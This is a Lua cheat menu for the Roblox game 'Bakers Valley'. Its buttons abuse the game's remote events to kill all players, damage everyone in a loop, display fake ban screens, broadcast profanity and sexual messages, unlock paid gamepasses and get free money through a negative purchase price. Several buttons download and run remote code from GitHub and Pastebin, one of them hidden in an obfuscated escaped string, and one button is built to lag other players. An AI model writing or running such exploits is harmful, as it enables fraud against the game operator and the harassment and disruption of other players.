shared.noclip = false
local stuff = {}


if not game:IsLoaded() then 
    game.Loaded:Wait()
end

local targetPlayer = game.Players.LocalPlayer
local teamFu = "Fugitives"
local teamPo = "Police"
local teamPr = "Prisoners"
local teamCh = "Choosing"

      
      
lp = game.Players.LocalPlayer

doorspamming = false
local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()

local Main = OrionLib:MakeWindow({Name = "Bakers Valley", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"})

local Tab = Main:MakeTab({
	Name = "Bakers Valley",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

local Section = Tab:AddSection({
	Name = "All Haxxxxx"
})

function doorSpam()
    wait()
    for _,doors in next, workspace.AllDoors:GetChildren() do --loop through doors
        game:GetService("Workspace").resources.RemoteEvent:FireServer("updateDoorSystem", doors) --main remote
    end
end
Tab:AddButton({
    Name = "Bubble Shield",
    Callback = function()
        local lib = require(game:GetService("Workspace").upsilonLibrary)
		local Bubble = Instance.new("Part")
		Bubble.Parent = Workspace
		Bubble.Size = Vector3.new(8, 8, 8)
		Bubble.CastShadow = false
		Bubble.CanCollide = false
		Bubble.Anchored = true
		Bubble.Shape = Enum.PartType.Ball
		Bubble.BrickColor = BrickColor.new("21")
		Bubble.Material = Enum.Material.ForceField
		Bubble.Transparency = 0
 
 
		function Shield(part)
			local properties = {
				["CanCollide"] = true,
				["Parent"] = Workspace,
				["Anchored"] = true,
				["BrickColor"] = part.BrickColor,
				["RotVelocity"] = part.RotVelocity,
				["Name"] = part.Name,
				["Position"] = part.Position,
				["Material"] = part.Material,
				["Shape"] = part.Shape,
				["Size"] = part.Size,
				["CastShadow"] = false,
				["Transparency"] = 1
 
 
			}
 
			lib.FireOtherClients("drawLaser",part.Position,part.Position,properties)
		end
 
		while task.wait(0.01) do
			Bubble.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
 
			Shield(Bubble)
		end
	end
})
Tab:AddButton({
    Name = "Profly",
    Callback = function()
        local lib = require(game:GetService("Workspace").upsilonLibrary)
		local Bubble = Instance.new("Part")
     Bubble.Parent = Workspace
		Bubble.Size = Vector3.new(10, 1, 10)
		Bubble.CastShadow = false
		Bubble.CanCollide = true
		Bubble.Anchored = true
		Bubble.Color = Color3.fromRGB(255, 0, 0)
		Bubble.Material = Enum.Material.Neon
		Bubble.Transparency = 0
 
 
		function fly(part)
			local properties = {
				["CanCollide"] = true,
				["Parent"] = Workspace,
				["Anchored"] = true,
				["BrickColor"] = part.BrickColor,
				["RotVelocity"] = part.RotVelocity,
				["Name"] = part.Name,
				["Position"] = part.Position,
				["Material"] = part.Material,
				["Size"] = part.Size,
				["CastShadow"] = false,
				["Transparency"] = 1
 
 
			}
 
			lib.FireOtherClients("drawLaser",part.Position,part.Position,properties)
		end
 
		while task.wait(0.01) do
			Bubble.Position = game.Players.LocalPlayer.Character.Head.Position + Vector3.new(0,-5,0)
 
			fly(Bubble)
		end
	end
})
Tab:AddButton({
    Name = "Darkone Portal Leaked",
    Callback = function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/lol8267vr/steal-this-bozos-script-/main/message-1.txt"))()
end
})
Tab:AddButton({
    Name = "Fly",
    Callback = function()
loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
end
})
Tab:AddButton({
    Name = "GodWalk",
    Callback = function()
        local lib = require(game:GetService("Workspace").upsilonLibrary)
		local Bubble = Instance.new("Part")
		Bubble.Parent = Workspace
		Bubble.Size = Vector3.new(1, 10, 10)
		Bubble.CastShadow = true
		Bubble.CanCollide = true
		Bubble.Anchored = true
		Bubble.Shape = Enum.PartType.Cylinder
		Bubble.Color = Color3.fromRGB(255, 0, 0)
		Bubble.Material = Enum.Material.Neon
		Bubble.Transparency = 0
     Bubble.Orientation = Vector3.new(0, 0, 90)
 
		function Shield(part)
			local properties = {
				["CanCollide"] = true,
				["Parent"] = Workspace,
				["Anchored"] = true,
				["BrickColor"] = part.BrickColor,
				["RotVelocity"] = part.RotVelocity,
          ["Orientation"] = Vector3.new(0, 0, 90),
				["Name"] = part.Name,
				["Position"] = part.Position,
				["Material"] = part.Material,
				["Shape"] = part.Shape,
				["Size"] = part.Size,
				["CastShadow"] = true,
				["Transparency"] = 1
 
			}
 
			lib.FireOtherClients("drawLaser",part.Position,part.Position,properties)
		end
 
		while task.wait(0.01) do
			Bubble.Position = game.Players.LocalPlayer.Character.Head.Position + Vector3.new(0,-5,0)
 
			Shield(Bubble)
		end
	end
})
Tab:AddButton({
	Name = "SEX",
	Callback = function()
        for i,v in pairs(game.Players:GetChildren())do
			local lib = require(game:GetService("Workspace").upsilonLibrary)

firesignal(game.Workspace.resources.RemoteEvent.OnClientEvent,"displayChoice",'returnToMenu',"sex")
lib.FireOtherClients("displayChoice",'returnToMenu',"sex")
        end
  	end    
})

Tab:AddButton({
	Name = "Lag Others",
	Callback = function() loadstring(game:HttpGet(('https://pastebin.com/raw/bLsmSvd0'),true))()
end
})

Tab:AddButton({
	Name = "Bridge Tool",
	Callback = function() 
local tool = Instance.new("Tool", game.Players.LocalPlayer.Backpack)
tool.RequiresHandle = false
tool.Name = "Bridge"
tool.CanBeDropped = false

local pos1 = nil
local pos2 = nil
local bridgesize = 10
local mouse = game.Players.LocalPlayer:GetMouse()
local isEquipped = false
local isSettingPos = false
local bridgeEnabled = false
local dist = 0

function asdf(origin, target, properties)
game.Workspace.resources.RemoteEvent:FireServer("FireAllClients","drawLaser", origin, target, properties)
end

mouse.KeyDown:Connect(function(k)
if not isEquipped then return end
key = k:lower()
if key == "e" then
if bridgesize <= 5 then return end
bridgesize = bridgesize - 1
game:GetService("StarterGui"):SetCore("SendNotification", {
Title = "Information";
Text = "New size: " .. bridgesize;
})
print(bridgesize)
end
if key == "r" then
if bridgesize >= 25 then return end
bridgesize = bridgesize + 1
game:GetService("StarterGui"):SetCore("SendNotification", {
Title = "Information";
Text = "New size: " .. bridgesize;
})
print(bridgesize)
end
if key == "t" then
bridgeEnabled = false
isSettingPos = false
pos1 = nil
pos2 = nil
bridgesize = 10
game:GetService("StarterGui"):SetCore("SendNotification", {
Title = "Information";
Text = "Values reset to default.";
})
end
end)


tool.Equipped:Connect(function()
isEquipped = true
game:GetService("StarterGui"):SetCore("SendNotification", {
Title = "Information";
Text = "Click to set positions, Press R to increase width, E to decrease width and Press T to reset.";
})
end)

tool.Unequipped:Connect(function()
isEquipped = false
end)



tool.Activated:Connect(function()
if not isSettingPos then
pos1 = mouse.hit
game:GetService("StarterGui"):SetCore("SendNotification", {
Title = "Information";
Text = "Position 1 saved, click again for position 2.";
})
isSettingPos = true
else
pos2 = mouse.hit
game:GetService("StarterGui"):SetCore("SendNotification", {
Title = "Information";
Text = "Position 2 saved, creating bridge...";
})
isSettingPos = false
bridgeEnabled = true
dist = (pos1.p-pos2.p).magnitude
end
end)

while true do
wait(.1)
if bridgeEnabled then
asdf(pos1.p, pos2.p, {
["CanCollide"] = true,
["Size"] = Vector3.new(bridgesize, 1, dist),
["CFrame"] = CFrame.new(pos1.p, pos2.p) * CFrame.new(0,0, -dist/2) * CFrame.Angles(0,0,0),
})
end
end
end
})

Tab:AddButton({
	Name = "C4 tool",
	Callback = function()
function createC4art(part, size, cframe, material, color, transparency)
wait (0.4)
  local lib = require(game:GetService("Workspace").upsilonLibrary)
    local g = Instance.new("Part")
    g.Parent = Workspace
    g.TopSurface = "Smooth"
    g.Material = Enum.Material.Ice
    g.Reflectance = 0
    g.CanCollide = true
    g.Anchored = true
    g.Size = Vector3.new(2, 2, 5)
    g.CFrame = cframe
    g.BrickColor = BrickColor.new("28")
    g.Transparency = transparency
    g.Parent = Workspace
    g.Shape = Enum.PartType.Block
    g.Orientation = Vector3.new(0, 0, 90)


    local properties = {
        ["TopSurface"] = "Smooth",
        ["Material"] = Enum.Material.Ice,
        ["Reflectance"] = 0,
        ["CanCollide"] = true,
        ["Anchored"] = true,
        ["Size"] = Vector3.new(2, 2, 5),
        ["CFrame"] = cframe,
        ["Shape"] = Enum.PartType.Block,
        ["Orientation"] = Vector3.new(0, 0, 90),
        ["BrickColor"] = BrickColor.new("28"),
        ["Transparency"] = transparency,
        ["Parent"] = Workspace
    }

    
    lib.FireOtherClients("drawLaser", part.Position, part.Position, properties)
wait(1)
    g:Destroy()
end

function createCPart(part, size, cframe, material, color, transparency)
wait (0.4)
  local lib = require(game:GetService("Workspace").upsilonLibrary)
    local g = Instance.new("Part")
    g.Parent = Workspace
    g.TopSurface = "Smooth"
    g.Material = Enum.Material.Neon
    g.Reflectance = 0
    g.CanCollide = false
    g.Anchored = true
    g.Size = Vector3.new(15, 15, 15)
    g.Velocity = Vector3.new(0, 8000, 0)
    g.CFrame = cframe
    g.BrickColor = BrickColor.new("133")
    g.Transparency = transparency
    g.Parent = Workspace
    g.Shape = Enum.PartType.Ball
    g.Orientation = Vector3.new(0, 0, 90)


    local properties = {
        ["TopSurface"] = "Smooth",
        ["Material"] = Enum.Material.Neon,
        ["Reflectance"] = 0,
        ["CanCollide"] = true,
        ["Anchored"] = true,
        ["Size"] = Vector3.new(15, 15, 15),
        ["Velocity"] = Vector3.new(0, 8000, 0),
        ["CFrame"] = cframe,
        ["Shape"] = Enum.PartType.Ball,
        ["Orientation"] = Vector3.new(0, 0, 90),
        ["BrickColor"] = BrickColor.new("133"),
        ["Transparency"] = transparency,
        ["Parent"] = Workspace
    }

    
    lib.FireOtherClients("drawLaser", part.Position, part.Position, properties)
wait(0.7)
    g:Destroy()
end

local tool = Instance.new("Tool", game.Players.LocalPlayer.Backpack)
tool.Name = "C4 Tool"
tool.RequiresHandle = false

tool.Activated:Connect(function()
    local mouse = game:GetService("Players").LocalPlayer:GetMouse()
    local mouseHit = mouse.Hit.p + Vector3.new(0, 0, 0)
    local cframe = CFrame.new(mouseHit)
    if mouse.Target and mouse.Target:IsA("BasePart") then
      createC4art(mouse.Target, mouse.Target.Size + Vector3.new(0.005, 0.005, 0.005), cframe, mouse.Target.Material, mouse.Target.Color, mouse.Target.Transparency)
end
    
    local mouse = game:GetService("Players").LocalPlayer:GetMouse()
    local mouseHit = mouse.Hit.p + Vector3.new(0, 0, 0)
    local cframe = CFrame.new(mouseHit)
    if mouse.Target and mouse.Target:IsA("BasePart") then
        createCPart(mouse.Target, mouse.Target.Size + Vector3.new(0.005, 0.005, 0.005), cframe, mouse.Target.Material, mouse.Target.Color, mouse.Target.Transparency)
    end
end)
end    
})
Tab:AddButton({
	Name = "Paint tool",
	Callback = function()
local lib = require(game:GetService("Workspace").upsilonLibrary) 
			function createpaint(part,Size,CFrame,Material,e,Transparency)
local paint = Instance.new("Part")
    paint.Parent = Workspace
    paint.TopSurface = "Smooth"
    paint.Material = Material
    paint.Reflectance = 0
    paint.CanCollide = true
    paint.Anchored = true
    paint.Size = Size
    paint.CFrame = CFrame
    paint.Color = Color3.fromRGB(255, 0, 0)
    paint.Transparency = transparency
    paint.Parent = Workspace

				local properties = {
					["TopSurface"] = DiscordInvite,
					["Material"] = Material,
					["Reflectance"] = 0,
					["CanCollide"] = true,
					["Anchored"] = true,
					["Size"] = Size,
					["CFrame"] = CFrame,
					["Color"] = Color3.fromRGB(255, 0, 0),
					["Transparency"] = Transparency,
					["Parent"] = Workspace
				}
				while wait (0) do
                while wait (0) do	lib.FireOtherClients("drawLaser",part.Position,part.Position,properties)
			end
end
end
			local tool = Instance.new("Tool", game.Players.LocalPlayer.Backpack)
			tool.Name = "Paint tool"
			tool.Parent = game.Players.LocalPlayer.Backpack
			local Player = Game.Players.LocalPlayer
			local Mouse = Player:GetMouse()
			tool.RequiresHandle = false
			tool.Activated:connect(function()
				if Mouse.Target:IsA("BasePart") then
					local paint = Instance.new("Part")
					paint.Parent = Workspace
					createpaint(paint,Mouse.Target.Size+Vector3.new(0.005,0.005,0.005),Mouse.Target.CFrame,Mouse.Target.Material,Mouse.Target.BrickColor,Mouse.Target.Transparency)
					paint:Destroy()
				end
			end)
end    
})
Tab:AddButton({
	Name = "SEX1",
	Callback = function()
    local Yourmessage = "SEX"

game:GetService("Workspace").resources.RemoteEvent:FireServer("FireAllClients", "smallNotice", Yourmessage)
end
})
Tab:AddButton({
	Name = "Say Fuck",
	Callback = function()
    local Yourmessage = "fuck you"

game:GetService("Workspace").resources.RemoteEvent:FireServer("FireAllClients", "smallNotice", Yourmessage)
end
})
Tab:AddButton({
	Name = "Say Fuck you 2",
	Callback = function()
    local Title = "Fuck you"
local Yourmessage = "bitch asses"


game:GetService("Workspace").resources.RemoteEvent:FireServer("FireAllClients", "showNotice", Title, Yourmessage)
end
})
Tab:AddButton({
	Name = "SEX2",
	Callback = function()
    local Title = "SEX"
local Yourmessage = "SEX"


game:GetService("Workspace").resources.RemoteEvent:FireServer("FireAllClients", "showNotice", Title, Yourmessage)
end
})

Tab:AddButton({
	Name = "All Gamepasses",
	Callback = function()
    sv=function(a,b)
game:GetService("Workspace").resources.RemoteFunction:InvokeServer("setDataValue",a,b)
end
gv=function(a)
return game:GetService("Workspace").resources.RemoteFunction:InvokeServer("getDataValue",a)
end
sv("hasMaglev",true)
sv("hasMasterChef",true)
sv("hasMaterials",true)
end
})

Tab:AddButton({
	Name = "Destroy Server",
	Callback = function()  
for i,v in pairs(workspace:GetDescendants()) do
      if v:IsA("BasePart") then
          game:GetService("Workspace").resources.RemoteEvent:FireServer("FireAllClients","updateAlarmLight",{["Active"] = {["Value"] = true},["glass"] = v,["main"] = v})
      end
   end
  end
})
Tab:AddButton({
	Name = "Whiteify Map",
	Callback = function()  
for i,v in pairs(workspace:GetDescendants()) do
      if v:IsA("BasePart") then
          game:GetService("Workspace").resources.RemoteEvent:FireServer("FireAllClients","updateAlarmLight",{["Active"] = {["Value"] = false},["glass"] = v,["main"] = v})
      end
   end
end
})
Tab:AddTextbox({
    Name = "Textbox",
    Default = "default box input",
    TextDisappear = true,
    Callback = function(Value)
        for i,v in pairs(game.Players:GetChildren())do
            local lib = require(game:GetService("Workspace").upsilonLibrary)

firesignal(game.Workspace.resources.RemoteEvent.OnClientEvent,"displayChoice",'returnToMenu',Value)
lib.FireOtherClients("displayChoice",'returnToMenu',Value)
        end
    end
})

Tab:AddButton({
	Name = "All Money (Bake a Cake First)",
	Callback = function()
game.Workspace.resources.RemoteFunction:InvokeServer("attemptPurchaseFurniture", "23", -10000)
	end
})


Tab:AddButton({
	Name = "Greenify Map",
    Callback = function()
			for i,v in pairs(workspace:GetDescendants()) do
   if v:IsA("BasePart") then
       game:GetService("Workspace").resources.RemoteEvent:FireServer("toggleCamControl",{["camera"] = {["status"] = v}},true)
   end
end
        end
})

Tab:AddButton({
	Name = "Kill All",
	Callback = function()
        for i,v in pairs(game.Players:GetPlayers()) do
   workspace.resources.RemoteEvent:FireServer("FireAllClients","drawLaser",Vector3.new(), Vector3.new(),{["Name"] = "Head",["Parent"] = v.Character})
end
    end
})
Tab:AddButton({
	Name = "Server Virus",
	Callback = function()
    local Title = "Attention"
local Yourmessage = "There Is A Global Virus,Stay Safe!"


game:GetService("Workspace").resources.RemoteEvent:FireServer("FireAllClients", "showNotice", Title, Yourmessage)
wait (5)
local Yourmessage = "Pandemic Has Started!"

game:GetService("Workspace").resources.RemoteEvent:FireServer("FireAllClients", "smallNotice", Yourmessage)
while wait (3) do
for i,v in pairs(game.Players:GetChildren()) do
game.Workspace.resources.RemoteEvent:FireServer("dealDamage", v.Character.Humanoid,10)
end
end
end
})
Tab:AddButton({
	Name = "Greyify Map",
	Callback = function()
        for i,v in pairs(workspace:GetDescendants()) do
   if v:IsA("BasePart") then
       game:GetService("Workspace").resources.RemoteEvent:FireServer("toggleCamControl",{["camera"] = {["status"] = v}},false)
   end
end
    end
})

Tab:AddTextbox({
    Name = "Message 1",
    Default = "Broadcast",
    TextDisappear = true,
    Callback = function(Value)
        for i,v in pairs(game.Players:GetChildren())do
            local lib = require(game:GetService("Workspace").upsilonLibrary)
local Yourmessage = "Value"

game:GetService("Workspace").resources.RemoteEvent:FireServer("FireAllClients", "smallNotice", Value)
end
    end
})
Tab:AddTextbox({
    Name = "Ban All",
    Default = "Broadcast",
    TextDisappear = true,
    Callback = function(Value)
        for i,v in pairs(game.Players:GetChildren())do
            local lib = require(game:GetService("Workspace").upsilonLibrary)
local Yourmessage = "Value"

game:GetService("Workspace").resources.RemoteEvent:FireServer("FireAllClients", "showBanScreen", Value)
end
    end
})
Tab:AddTextbox({
    Name = "Ban Others",
    Default = "Broadcast",
    TextDisappear = true,
    Callback = function(Value)
        for i,v in pairs(game.Players:GetChildren())do
            local lib = require(game:GetService("Workspace").upsilonLibrary)
local Yourmessage = "Value"

game:GetService("Workspace").resources.RemoteEvent:FireServer("FireOtherClients", "showBanScreen", Value)
end
    end
})
Tab:AddButton({
	Name = "Speed",
	Callback = function()  
game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = "60"
end
})
Tab:AddButton({
	Name = "Jump",
	Callback = function()
game.Players.LocalPlayer.Character.Humanoid.JumpPower = "200"
    end
})
OrionLib:Init()


while wait() do
    if doorspamming == false then
        
    else
        doorSpam()
    end
end

--noclip

pcall(function()
    game:GetService("RunService").Stepped:Connect(function()
       if shared.noclip == true then
           lp.Character.Head.CanCollide = false
           lp.Character.Torso.CanCollide = false
       end
    end);
    end) 